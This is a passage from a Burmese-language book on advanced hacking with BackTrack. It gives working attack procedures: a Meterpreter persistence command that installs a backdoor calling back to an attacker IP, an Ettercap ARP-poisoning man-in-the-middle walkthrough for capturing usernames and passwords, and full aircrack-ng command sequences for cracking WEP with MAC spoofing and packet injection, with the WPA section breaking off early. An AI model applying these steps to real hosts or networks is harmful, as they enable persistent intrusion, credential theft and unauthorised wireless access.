ကို အလိုအေလွ်ာက္စတင္ေစပါသည္။

184 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 -S : ထို Option သည္ System Service တစ္ခုအျဖစ္ျဖင့္ Backdoor ကိုအလုိအေလွ်ာက္


စတင္ေစပါသည္။
 -U : ထို Option သည္ User ကို System ကို Boot ျပဳလုပ္ေသာအခါတြင္ Backdoor ကို
အလိုအေလွ်ာက္စတင္ေစႏိုင္ပါသည္။
 -i : ထို Option သည္ attack machine သို႕ ထိုးေဖာက္၀င္ေရာက္ရန္ ႀကိဳးပမ္းမႈမ်ားအၾကားမွ
စကၠန္႕ျဖင့္ တိုင္းတာရေသာ အခ်ိန္ကို သတ္မွတ္ေပးႏိုင္ပါသည္။
 -p : ထို Option သည္ Attacker machine တြင္ Metasploit ကိုအသံုးျပဳ၍ listening ျပဳလုပ္ရန္
အတြက္ Port ကို သတ္မွတ္ေပးႏိုင္ပါသည္
 -P : ထို Option သည္ အသံုးျပဳရန္အတြက္ payload ကိုသတ္မွတ္ေပးပါသည္။ reverse_tcp
ဟူေသာ payload ကို နဂိုမူလအတိုင္း အသံုးျပဳရၿပီး ေယဘုယ်အားျဖင့္ အသံုးျပဳလိုေသာ ကိစၥ
တစ္ခုအတြက္ အသံုးျပဳႏိုင္ပါသည္။
 -r : ထို Option သည္ Attack machine ၏ IP Address မ်ားကို သတ္မွတ္ေပးေစႏိုင္သည္။

၄။ ထို႕ေနာက္ Backdoor ကို Setup ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command ျဖင့္ လုပ္ေဆာင္ႏိုင္ပါသည္။

run persistence –U –A –i 10 -8090 –r 192.168.10.109

၅။ Backdoor ကို သတ္မွတ္ၿပီးျဖစ္ပါသည္။ အကယ္၍ ေအာင္ျမင္ပါက ဒုတိယ Meterpreter Session


တစ္ခုရိွသင့္ေၾကာင့္ သတိျပဳမိပါလိမ့္မည္။

မ်က္ပြင့္စာေပ 185
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းတြင္ Meterpreter ကို Persistent backdoor တစ္ခုကို Set up ျပဳလုပ္ရန္အတြက္ အသံုးျပဳခဲ့ပါ


သည္။ ယခုအပိုင္းတြင္ Host ကို Compromise ျပဳလုပ္ၿပီး Meterpreter shell ရရိွၿပီးျဖစ္သည္ဟု မွတ္ယူ
ပါသည္။ ထို႕ေနာက္ Persistence တြင္အသံုးျပဳႏိုင္ေသာ Option မ်ားကို Help ဖိုင္ကို ေခၚယူၾကည္႕ျခင္းျဖင့္
ေတြ႕ျမင္ႏိုင္ေစၿပီး ေနာက္ဆံုးတြင္ Backdoor တစ္ခုကို Install ျပဳလုပ္ေစႏိုင္ရန္ႏွင့္ Option မ်ားကို Setting
ခ်ရန္အတြက္ အသံုးျပဳရသည္႕ Command မ်ားကို ေဖာ္ျပေပးခဲ့ပါသည္။

Man-in-the-middle attack (MITM)


ယခုအပိုင္းတြင္ Target တစ္ခုကို တိုက္ခိုက္ရန္အတြက္ man-in-the-middle attack ကိုသံုးစြျဲ ခင္း က႑
ကိုေလ့လာရပါမည္။ MITM attack တစ္ခုသည္ Target ႏွင့္ legitimate party ၾကားတြင္ Commnication
ေပၚတြင္ ၾကား၀င္နားေထာင္ႏိုင္ရန္အတြက္ ခြင့္ျပဳသည္႕အလုပ္ကိုလုပ္ေဆာင္ေပးပါသည္။ ဥပမာအားျဖင့္
http://www.yahoo.com ေပၚမွ Email ကုိစစ္ေဆးေနစဥ္တြင္ Windows Host ၏ Communcation ေပၚမွ
ၾကားျဖတ္နားေထာင္ရန္အတြက္ Ettercap ကိုအသံုးျပဳႏိုင္ပါသည္။

Ettercap ကို launching ျပဳလုပ္ျခင္းျဖင့္ MITM attack ကိုစတင္ေပးႏိုင္ပါသည္။

၁။ Terminal Window ကိုဖြင့္၍ Ettercap ကိုစတင္ရပါမည္။ -G Option ကိုအသံုးျပဳျခင္းျဖင့္ GUI Mode


ျဖင့္ စတင္ႏိုင္ပါသည္။

ettercap -G

186 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ ထို႕ေနာက္ Unified Sniffing ကို ဖြင့္ရန္အတြက္ လုပ္ေဆာင္ခ်က္မ်ားကို စတင္ရပါမည္။ ထို႕ေနာက္


Shift + U ကို ႏိွပ္ျခင္းျဖင့္ျဖစ္ေစ၊ Menu အသံုးျပဳ၍ Sniff > Unified Sniffing ကိုေရြးခ်ယ္ျခင္းျဖင့္ျဖစ္ေစ
Unified Sniffing ကိုဖြင့္ႏိုင္ပါသည္။

၃။ ထို႕ေနာက္ Network Interface ကိုေရြးခ်ယ္ေပးရပါမည္။ ယခုအပိုင္းတြင္ MITM attack ကိုအသံုးျပဳ


မည္ျဖစ္ေသာေၾကာင့္ Wireless Interface ကိုေရြးခ်ယ္ေပးရပါမည္။

၄။ Host မ်ားကို Scanning ျပဳလုပ္ႏိုင္ရန္ ဖြင့္ေပးရပါမည္။ ထို႕ေၾကာင့္ ထိုသို႕လုပ္ေဆာင္ရန္အတြက္ Ctrl


+ S သုိ႕မဟုတ္ Menu မွတစ္ဆင့္ Hosts> Scan for hosts ကိုေရြးခ်ယ္ေပးရပါမည္။

၅။ ထို႕ေနာက္ Hosts list မ်ားကိုေတြ႕ရပါမည္။ ထိုအခါ H ကိုႏိွပ္၍ေသာ္လည္းေကာင္း၊ Menu မွ Hosts>


Hosts List ကိုေရြးခ်ယ္၍ေသာ္လည္းေကာင္း ျပဳလုပ္ရပါမည္။

မ်က္ပြင့္စာေပ 187
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ ထိ႕ု ေနာက္ Target မ်ားကိုသတ္မွတ္ရန္အတြက္ ေရြးခ်ယ္ေပးရန္လိုအပ္ပါသည္။ ထို႕ေၾကာင့္ Target ကို


192.168.10.112 အျဖစ္ေရြးခ်ယ္ရန္ အတြက္ Highlight ျဖစ္ေနေသာ First Target ကိုေရြးခ်ယ္ကာ Add
to Target 1 ခလုတ္ကို Click ႏိွပ္ေပးရပါမည္။

၇။ ယခုအခါ Sniffing ကိုစတင္ရန္အတြက္ Ettercap ကို Allow ျပဳလုပ္ေပးႏိုင္ၿပီျဖစ္သည္။ ထိုသို႕ျပဳလုပ္ရန္


Ctrl + W ႏိွပ္ျခင္းျဖင့္ျဖစ္ေစ၊ Menu မွ Start> Sniffing ကိုေရြးခ်ယ္၍ျဖစ္ေစ အသံုးျပဳရပါမည္။

188 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ ေနာက္ဆံုးတြင္ ARP Poisoning လုပ္ငန္းစဥ္စတင္ပါမည္။ Menu မွ Mitm> Arp Poisoning ကို


ေရြးခ်ယ္ေပးရပါမည္။

၉။ ေအာက္တြင္ေဖာ္ျပထားေသာ Windows ေပၚလာေသာအခါ Sniff remote Connections တြင္


အမွန္ျခစ္ေရြးခ်ယ္ေပးပါ။

၁၀။ Network ၏ Traffic အေပၚတြင္မူတည္၍ Ettercap Window ေပၚတြင္ Information မ်ားေတြ႕ႏိုင္ရန္


အတြက္ စတင္ရပါမည္။

မ်က္ပြင့္စာေပ 189
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၁။ ရွာေဖြေနေသာ (Username မ်ား၊ Password မ်ား) ေတြ႕ရိွရၿပီးေသာအခါတြင္ Ettercap ကုိျပန္ပိတ္ရ


ပါမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ctrl + E ကိုတႏ
ြဲ ိွပ္၍ျဖစ္ေစ၊ Menu မွအသံုးျပဳလိုပါက Start> Stop
Sniffing ကိုေရြးခ်ယ္၍ျဖစ္ေစ ျပဳလုပ္ေပးရပါမည္။

၁၂။ ယခုအခါတြင္ ARP Poisoning ကို ပိတ္၍ Network ကုိပံုမွန္အတိုင္းျပန္ထားရပါမည္။ ၄င္းသည္


Attack မစတင္မီအခ်ိန္မွ Network ေပၚတြင္ Packets မ်ားစီးဆင္းသကဲ့သို႕ (ပံုမွန္အတိုင္းျဖစ္ေစရန္)
ျပဳလုပ္ေပးပါလိမ့္မည္။

ယခုအပိုင္းကိုေဖာ္ျပရာတြင္ ARP Packet Poisoning ကို အသံုးျပဳ၍ အသံုးျပဳသူတစ္ေယာက္မွ ထုတ္လႊင့္


ေပးလိုက္ေသာ Wireless Commnication (ဆက္သြယ္ခ်က္) မ်ားကို ၾကားျဖတ္နားေထာင္ရန္အတြက္
MITM Attack ျပဳလုပ္မႈကိုေဖာ္ျပထားျခင္းျဖစ္ပါသည္။

မွတ္ရန္။ ။ MITM attack အေၾကာင္းကို ပိုမိုသိရိွႏိုင္ေစရန္အတြက္ http://en.wikipedia.org/


wiki/Man-in-the-middle_attack#Example_of_an_attack တြင္ေလ့လာႏိုင္ပါသည္။

190 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 7

Wireless Network Analysis


ႀကိဳးမဲ့ကြန္ယက္ကိုချြဲ ခမ္းစိတ္ျဖာျခင္း

မ်က္ပြင့္စာေပ 191
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
ယေန႕ေခတ္တြင္ Wireless Network မ်ားကို ယခင္က စိတ္ပင္မကူးဖူးေသာႏႈန္းထားျဖင့္ ေနရာတိုင္းတြင္
ေတြ႕ရိွႏိုင္ၿပီျဖစ္သည္။ အသံုးျပဳသူအမ်ားစုအတြက္ Internet Access ကိုရရိွႏိုင္ရန္ Ethernet Cable
မ်ားကိုသာ အားကိုးေနရာျခင္းသည္ မသင့္ေတာ္ေသာ ျဖစ္ရပ္တစ္ခုအျဖစ္သာ က်န္ခဲ့ၿပီျဖစ္သည္။ Ethernet
Cable ကိုအသံုးျပဳျခင္း၏ ေကာင္းကြက္တစ္ခုကို ဆြထ
ဲ ုတ္ျပလွ်င္ Wireless Connection မ်ားသည္
Ethernet Connection မ်ားထက္ ပိုမို လံုၿခံဳစိတ္ခ်ရျခင္းပင္ျဖစ္သည္။ ယခုအခန္းတြင္ Mobile Phone
မ်ားအပါအ၀င္ Wireless Networks မ်ားတြင္အသံုးျပဳေသာ Radio Network Traffic မ်ားကို ကိုင္တြယ္
ထိုးေဖာက္နည္းမ်ားကို ေလ့လာရမည္ျဖစ္ပါသည္။ ယခုအခန္းတြင္ ပါ၀င္ေသာ က႑မ်ားမွာ ေအာက္ပါ
အတိုင္းျဖစ္ပါသည္။

 Cracking a WEP Wireless Network


 Cracking a WPA/WPA2 Wireless Network
 Automating a wireless network cracking
 Accessing clients using a fake AP
 URL traffic manipuation
 Prot redirection
 Sniffing network traffic
 Accessing an email by stealing cookies

Cracking a WEP wireless network


Wireless Equivalent Privacy (WEP ဟုအတိုေကာက္ေခၚၾကသည္) နည္းပညာကို 1999 ခုႏွစ္
ကတည္းကစတင္အသံုးျပဳခဲ့ၾကၿပီး Security Standard အေဟာင္းလည္းျဖစ္သည္။ ၄င္းကို Secure
Wireless Network မ်ားတြင္အသံုးျပဳၾကသည္။ 2003 ခုႏွစ္တြင္ WEP နည္းပညာကို WPA ႏွင့္အစားထိုး
ခဲ့ၿပီးေနာက္ပိုင္းတြင္ WPA2 ကိုအသံုးျပဳလာခဲ့ၾကသည္။ Security ပိုမိုေကာင္းမြန္ေသာ Protocol
မ်ားထြက္ရိွလာသည္ႏွင့္အမွ် WEP encryption ကို စြန႕္ ပယ္လာခဲ့ၾကသည္။ ယင္းအခ်က္ေၾကာင့္ပင္ WEP

192 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

encryption ကို လံုၿခံဳေရးအတြက္ Network တြင္ အသံုးမျပဳၾကရန္ တိုက္တြန္းထားပါသည္။ သုိ႕ရာတြင္


WEP encryption ကို ထိုးေဖာက္မႈမ်ားကို နည္းပညာအရ သာေဖာ္ျပေပးမည္ျဖစ္သည္။

WEP key ကို Crack ျပဳလုပ္ရန္အတြက္ Aircrack ကိုအသံုးျပဳသင့္ပါသည္။ Aircrack suite (Aircrack NG)
တို႕သည္ WEP ႏွင့္ WPA key မ်ားကို Cracking ျပဳလုပ္ႏိုင္ေသာ Program ျဖစ္ၿပီး Network Packet မ်ားကို
Capture ျပဳလုပ္ျခင္း၊ Analyze ျပဳလုပ္ျခင္းတို႕ျပဳလုပ္ႏိုင္ေစကာ ေနာက္ဆံုးအဆင့္ အေနျဖင့္ WEP Key
တစ္ခုကို Crack ျပဳလုပ္ႏိုင္ေစမည္ျဖစ္သည္။

ယခုသင္ခန္းစာကိုစတင္ေလ့လာရန္အတြက္ လိုအပ္ခ်က္မ်ားကို အရင္ဦးစြာေဖာ္ျပေပးမည္ျဖစ္သည္။

BackTrack Terminal Windows ကိုအသံုးျပဳရမည္ျဖစ္ကာ packet injection အတြက္ Wireless card


configure ကိုေထာက္ပံ့ေစမည္႕ Wireless card ကိုအသံုးျပဳရမည္ျဖစ္ပါသည္။ ထိုအပိုင္းကိုအသံုးျပဳရန္
အတြက္ Aircrack ကိုအသံုးျပဳရမည္ျဖစ္သည္။ လုပ္ေဆာင္ရမည္႕ အခ်က္မ်ားကို ေအာက္တြင္အဆင့္
အလိုက္ေဖာ္ျပေပးသြားမည္ျဖစ္သည္။ စတင္လုပ္ေဆာင္ၾကည္႕ၾကပါမည္။

၁။ Terminal Windows ကိုဖြင့္ပါ။ ထိ႕ု ေနာက္ Wireless Network Interface တြင္အသံုးျပဳေနေသာ


စာရင္းကို ၾကည္႕ရွဳႏုိင္ေစရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

airmon-ng

၂။ Interface Column ေအာက္တြင္ လက္ရိွအသံုးျပဳေနေသာ Interface မွ တစ္ခုခုကို ေရြးခ်ယ္ေပးရပါ


မည္။ ယခုလုပ္ေဆာင္ခ်က္တြင္ wlan0 ကိုေရြးခ်ယ္ေပးရမည္ျဖစ္သည္။ အကယ္၍ ကြျဲ ပားေသာ Interface
မ်ားစြာကိုအသံုးျပဳပါက (ဥပမာအားျဖင့္ mono0) အသံုးျပဳထားသည္႕ wlan0 ၏ ေနရာတြင္ ၄င္း
ကုိအစားထုိးအသံုးျပဳရပါမည္။

၃။ ထိ႕ု ေနာက္ wlan0 Interface ကို stop ျပဳလုပ္ရန္လိုအပ္မည္ျဖစ္ၿပီး ေနာက္အဆင့္အရ MAC address
ကို ေျပာင္းလဲရန္အတြက္ျဖစ္ေသာေၾကာင့္ ေအာက္ပါ Command မ်ားကိုအသံုးျပဳရပါမည္။

airmon –ng stop

မ်က္ပြင့္စာေပ 193
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ifconfig wlan0 down

၄။ ထို႕ေနာက္ အသံုးျပဳေနေသာ Interface ၏ MAC Address ကိုေျပာင္းလဲရန္ လိုအပ္မည္ျဖစ္သည္။


အသံုးျပဳေနေသာ ကြန္ပ်ဴတာ၏ MAC Address ကို မည္သည္႕ Network မွမဆို သိရိွေစႏိုင္သည္။ ထိုကဲ့သို႕
MAC Address ကိုေျပာင္းလဲျခင္းျဖင့္ ကြန္ပ်ဴတာတြင္အသံုးျပဳထားေသာ MAC Address အမွန္ကို
ေဖ်ာက္ထားေပးႏိုင္သည္။ ထိုကဲ့သို႕ေျပာင္းလဲျခင္းျခင္းတြင္ MAC Address ကို 00:11:22:33:44:55 ဟူ၍
အသံုးျပဳမည္ျဖစ္သည္။ ထို႕ေၾကာင့္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

macchanger –mac 00:11:22:33:44:55 wlan0

၅။ ထို႕ေနာက္ Airmon-ng Command ကို Restart ျပဳလုပ္ရန္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

airmon-ng start wlan0

၆။ ထို႕ေနာက္ အနီးအနားတြင္ရိွေသာ Wireless Network မ်ားကို Locate ျပဳလုပ္ရန္အတြက္ Airodump


ကိုအသံုးျပဳရပါမည္။

airodump-ng wlan0

၇။ အသံုးျပဳႏိုင္ေသာ Network စာရင္းကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ ထို႕ေနာက္ Attack ျပဳလုပ္လိုေသာ


Network တစ္ခုကို ေရြးခ်ယ္လိုအပ္မည္ျဖစ္သည္။ ထိုကဲ့သို႕ Attack ျပဳလုပ္လိုေသာ Network ကို
ရွာေတြ႕သည္ႏွင့္ ရွာေဖြျခင္းကို Ctrl +C ႏိွပ္၍ အဆံုးသတ္ေပးႏိုင္သည္။ ထို႕ေနာက္ Attack ျပဳလုပ္လိုေသာ
Network ၏ BSSID Column မွ MAC Address ကိုေရြးခ်ယ္၍ Right Click ႏိွပ္ကာ Copy ကိုေရြးခ်ယ္
ေပးရပါမည္။ ထို႕အျပင္ ထုတ္လႊင့္ေပးေနေသာ Network ၏ Channel ကိုသိရိွထားရပါမည္။ ထိုအခ်က္
အလက္မ်ားကို Channel Column တြင္ေတြ႕ရိွႏိုင္ပါသည္။ ဥပမာအားျဖင့္ ယခုစမ္းသပ္မည္႕ Channel ကို
10 ဟုယူဆထားပါမည္။

၈။ ထို႕ေနာက္ Airodump ကိုေမာင္းႏွင္ရမည္ျဖစ္ၿပီး ေရြးခ်ယ္ထားေသာ BSSID ၏ အခ်က္အလက္မ်ားကို


ကူးထည္႕ေပးရမည္ျဖစ္သည္။ Airodump ကိုအသံုးျပဳရာတြင္ ေအာက္တြင္ေဖာ္ျပထားေသာ option မ်ား
ကိုအသံုးျပဳႏိုင္ပါသည္။

194 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 -c : ၄င္း Option သည္ Channel ကိုေရြးခ်ယ္ခြင့္ျပဳမည္ျဖစ္သည္။ ဤေနရာတြင္


လက္ရိွအေနျဖင့္ 10 ကိုအသံုးျပဳမည္ျဖစ္သည္။
 -w : ထို Option သည္ အသံုးျပဳသည္႕ ဖိုင္၏ အမည္ကို ေရြးခ်ယ္ခြင့္ျပဳထားပါသည္။
ထိုဖိုင္ကို ဤေနရာတြင္ wirelessattack ဟုေပးထားပါမည္။
 -bssid : ထို Option သည္ အသံုးျပဳရမည္႕ BSSID ကိုေရြးခ်ယ္ခြင့္ေပးထားပါသည္။
ယခုေနရာတြင္ Clipboard တြင္ Copy ကူးထားေသာ 09:AC:90:AB: 78 ကုိအသံုးျပဳရပါ
မည္။

အထက္တြင္ေဖာ္ျပထားေသာ Option ကိုမ်ားကို တေပါင္းတည္းအသံုးျပဳႏိုင္ရန္အတြက္ ေအာက္ပါ


Command ကိုအသံုးျပဳႏိုင္သည္။

airodump –ng –c 10 –w wirelessattack –bssid 09:AC:90:AB:78 wlan0

၉။ Terminal Window ေနာက္တစ္ခုပြင့္လာၿပီး အထက္တြင္အသံုးျပဳခဲ့ေသာ Command အရ Result ကို


ေဖာ္ျပေပးမည္ျဖစ္သည္။ ထို Terminal ကိုမပိတ္ပါႏွင့္။

၁၀။ Terminal Window ေနာက္တစ္ခုကိုဖြင့္ေပးရမည္။ ထို႕ေနာက္ Aireplay ကိုစတင္အသံုးျပဳမည္ျဖစ္


မည္။ Command ေရးသားရမည္႕ပံုစံမွာ aireplay –ng -1 0 –a [BSSID] –h [MAC Address] –e [ESSID]
[Interface] ျဖစ္သည္႕အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳၾကည္႕ရမည္ျဖစ္သည္။

aireplay-ng -1 0 –a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0

၁၁။ ထို႕ေနာက္ Router သိ႕ု Traffic အနည္းငယ္ ေပးပို႕မည္ျဖစ္ၿပီး Data မ်ားကို Capture လုပ္ယူမည္
ျဖစ္သည္။ ထို႕ေၾကာင့္ Aireplay Command ကိုေနာက္တစ္ႀကိမ္ထပ္မံအသံုးျပဳရမည္ျဖစ္သည္။ အသံုးျပဳ
မည္႕ပံုစံမွာ aireplay –ng -3 –b [BSSID] – h [MAC Address] ျဖစ္သည္႕အတြက္ တကယ္တမ္းအသံုး
ျပဳႏိုင္ေစရန္ ေအာက္တြင္ေဖာ္ျပထားေသာ Command ကိုအသံုးျပဳရပါမည္။

aireplay –ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0

မ်က္ပြင့္စာေပ 195
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၂။ Traffic မ်ားကိုစတင္ဖမ္းယူေနမည္ျဖစ္သည္။ ယခုလုပ္ငန္းစဥ္သည္ မိနစ္အနည္းငယ္ၾကာျမင့္မည္ျဖစ္


ၿပီး WEP Key ကို Crack လုပ္ႏိုင္ရန္အတြက္ အခ်က္အလက္မ်ားကို စုေဆာင္းျခင္းလုပ္ငန္းမ်ားကို လုပ္ကိုင္
ေနျခင္းျဖစ္သည္။

၁၃။ ေနာက္ဆံုးတြင္ WEP key ကို Crack ျပဳလုပ္ႏိုင္ရန္အတြက္ Aircrack Command ကိုအသံုးျပဳရပါ မည္။

aircrack –ng –b 09:AC:90:AB:78 wirelessattack.cap

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕လွ်င္ Wireless Network တစ္ခု၏ WEP Key ကို Crack လုပ္ယူရန္


တြက္ Aircrack Suite ကိုအသံုးျပဳရျခင္းျဖစ္သည္။ Aircrack သည္ WEP Crack လုပ္ယူရန္ အတြက္
အထင္ရွားဆံုးေသာ Program တစ္ခုလည္းျဖစ္ပါသည္။ Aircrack သည္ WEP ေပၚမွ Wireless connection
မွ လႊင့္ထုတ္လိုက္ေသာ Packet မ်ားကို စုေဆာင္းဖမ္းယူျခင္းလုပ္ငန္းစဥ္ကို လုပ္ကိုင္ေဆာင္ ရြက္ၿပီး
သခ်ာၤနည္းလမ္းကိုအသံုးျပဳ၍ WEP encrypted key ကုိ crack လုပ္ယူျခင္းျဖစ္သည္။ ယခုအပိုင္း တြင္
aircrack ကိုအသံုးျပဳၿပီး ေဖာက္ခ်င္ေသာ interface ကိုေရြးခ်ယ္ျခင္းသာျဖစ္သည္။ ထို႕ေနာက္ MAC
Address ကိုေျပာင္းလဲၿပီး Network ကိုမျမင္ရေစရန္ျပဳလုပ္ကာ ေဖာက္လိုေသာ Wireless Network
မ်ားကို Airodump ကိုအသံုးျပဳကာ ရွာေဖြျခင္းလည္းျဖစ္သည္။ ေဖာက္လိုေသာ Network ကုိေတြ႕ရိွေသာ
အခါတြင္ Aireplay ကိုအသံုးျပဳၿပီး MAC Address ျဖင့္ ခ်ိတ္ဆက္ႏိုင္ေအာင္ ျပဳလုပ္သည္။ ထို႕ေနာက္
Packet Traffic မ်ားကိုဖမ္းယူၿပီး Brute forced ျဖင့္ CAP file ကို ထုတ္ယူကာ Wireless Password ကို
Crack လုပ္ယူျခင္းျဖစ္သည္။ ယေန႕ေခတ္တြင္ WEP နည္းလမ္းကိုအသံုးနည္းပါသည္။ သို႕ေသာ္
နည္းပညာအရ သိရိွႏိုင္ေစရန္အတြက္သာ ေဖာ္ျပျခင္းျဖစ္သည္။




196 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Cracking a WPA/ WPA2 wireless network


Wifi Protected Access (WPA ဟုအတိုေကာက္ေခၚသည္) ကို 2003 ခုႏွစ္ခန္႕တြင္ ေဖာ္ထုတ္ခဲ့ ၾကၿပီး
အက်ိဳးဆက္အားျဖင့္ ေခတ္မမီေတာ့ေသာ WEP Encryption ေနရာတြင္ အစားထိုး၍ Wireless Network
၏လံုၿခံဳေရးကို တိုးျမွင့္ေပးရန္ အသံုးျပဳသည္။ WEP ကို 2003 ခုႏွစ္တြင္ WPA ႏွင့္အစားထိုးခဲ့ ၾကၿပီး
ေနာက္ပိုင္းတြင္ WPA2 ကိုထပ္မံအဆင့္ျမွင့္တင္ အသံုးျပဳခဲ့ပါသည္။ ပိုမိုလံုၿခံဳေသာ လံုၿခံဳေရးစနစ္ မ်ား
ေပၚထြက္လာသည္ႏွင့္အမွ် WEP ကိုအသံုးမျပဳၾကေတာ့ပါ။ WEP encryption ကို Crack လုပ္ႏိုင္ ေသာ
နည္းပညာအမ်ားအျပားေပၚထြက္လာျခင္းသည္လည္း WEP ကိုအသံုးမျပဳၾကျခင္း၏ အခ်က္တစ္ခု
လည္းျဖစ္လာပါသည္။ ယခုအပိုင္းတြင္ WPA Key တစ္ခုကို ထိုးေဖာက္ ရယူပံုကိုေဖာ္ျပေပးမည္ျဖစ္သည္။
ထိုကဲ့သို႕ WPA Key ကိုရယူရန္အတြက္ကိုလည္း Aircrack ကိုသာအသံုးျပဳလုပ္ေဆာင္သြားျခင္းျဖစ္ပါ
သည္။

ယခုအပိုင္းတြင္ Aircrack suite ကိုသာထပ္မံအသံုးျပဳမည္ျဖစ္သည္။ လိုအပ္ခ်က္မွာ Wireless Card


တစ္ခုလိုအပ္မည္ျဖစ္သည္။ အကယ္၍ Latop ကိုအသံုးျပဳပါက ေနာက္ပိုင္းထုတ္ Latop မ်ားတြင္ Wireless
Network Card ပါရိွၿပီးသားျဖစ္ေသာ္လည္း Desktop ကြန္ပ်ဴတာမ်ားတြင္ အသံုးျပဳရန္အတြက္ Wireless
Network Card ကိုတပ္ဆင္ထားရမည္ျဖစ္ပါသည္။ ထုိ႕ေနာက္ လုပ္ေဆာင္ပံုကို ေလ့လာၾကည္႕ ၾကပါမည္။

၁။ Terminal Window ကိုဖြင့္ၿပီး Wireless Network Interface အသံုးျပဳမႈကိုသိရိွႏိုင္ရန္ ေအာက္ပါ


Command ကိုအသံုးျပဳရမည္ျဖစ္သည္။

airmon-ng

၂။ Interface Column ေအာက္မွ လက္ရိွကြန္ပ်ဴတာတြင္ အသံုးျပဳေနေသာ Interface ကိုေရြးခ်ယ္ေပးရ


ပါမည္။ ဤစာအုပ္ပါ ယခုေနရာတြင္ wlan0 ကိုအသံုးျပဳသြားမည္ျဖစ္ေသာ္လည္း အသံုးျပဳသူမ်ား၏
Interface အေပၚမူတည္၍ အနည္းငယ္ခန္႕ကြျဲ ပားမႈရိွမည္ျဖစ္သည္။ အသံုးျပဳသူကြန္ပ်ဴတာတြင္ေတြ႕ရ
သည္႕ Interface ကို wlan0 ေနရာတြင္ အစားထိုးျခင္းျဖင့္ အဆင္ေျပစြာအသံုးျပဳႏိုင္မည္ျဖစ္သည္။

မ်က္ပြင့္စာေပ 197
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Wlan0 Interface ကို ရပ္တန္႕ရန္လိုအပ္မည္ျဖစ္ၿပီး ေအာက္ပါ Command ကိုအသံုးျပဳျခင္းျဖင့္


ရပ္တန္႕ေစႏိုင္မည္ျဖစ္သည္။

airmon-ng stop wlan0

ifconfig wlan0 down

၄။ ထို႕ေနာက္ Interface ေပၚမွ MAC Address ကိုေျပာင္းလဲရပါမည္။ ယခုစာအုပ္တြင္ 00:11:22:33:44:


55 ကိုအသံုးျပဳထားၿပီး ႏွစ္သက္ရာ MAC Address တစ္ခုကို အစားထိုးသံုးစြႏ
ဲ ိုင္ပါသည္။

macchanger –mac 00:11:22:33:44:55 wlan0

၅။ ထို႕ေနာက္ Airmon-ng ကို Restart ျပဳလုပ္ရန္ လိုအပ္မည္ျဖစ္သည္႕အတြက္ ေအာက္ပါ Command


ကိုအသံုးျပဳရပါမည္။

airmon-ng start wlan0

၆။ ထို႕ေနာက္ Airodump ကိုအသံုးျပဳ၍ အနီးအနားရိွ ထိုးေဖာက္ႏိုင္ေသာ Wireless Network မ်ားကို


ရွာေဖြရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

airodump-ng wlan0

၇။ အသံုးျပဳႏိုင္ေသာ network မ်ားကိုစာရင္းလုပ္ေဖာ္ျပခ်က္ကို ေတြ႕ျမင္ရမည္ျဖစ္သည္။ ထို႕ေနာက္


ထိုးေဖာက္လိုေသာ Network တစ္ခုကိုေရြးခ်ယ္ရန္အတြက္ ရွာေဖြျခင္းကို Ctrl +C တြႏ
ဲ ိွပ္၍ ရပ္တန္႕ရ မည္။
ထို႕ေနာက္ BSSID Column မွ MAC Address ကိုေရြးခ်ယ္ၿပီးေနာက္ Mouse မွ Right Click ႏိွပ္ၿပီး Copy
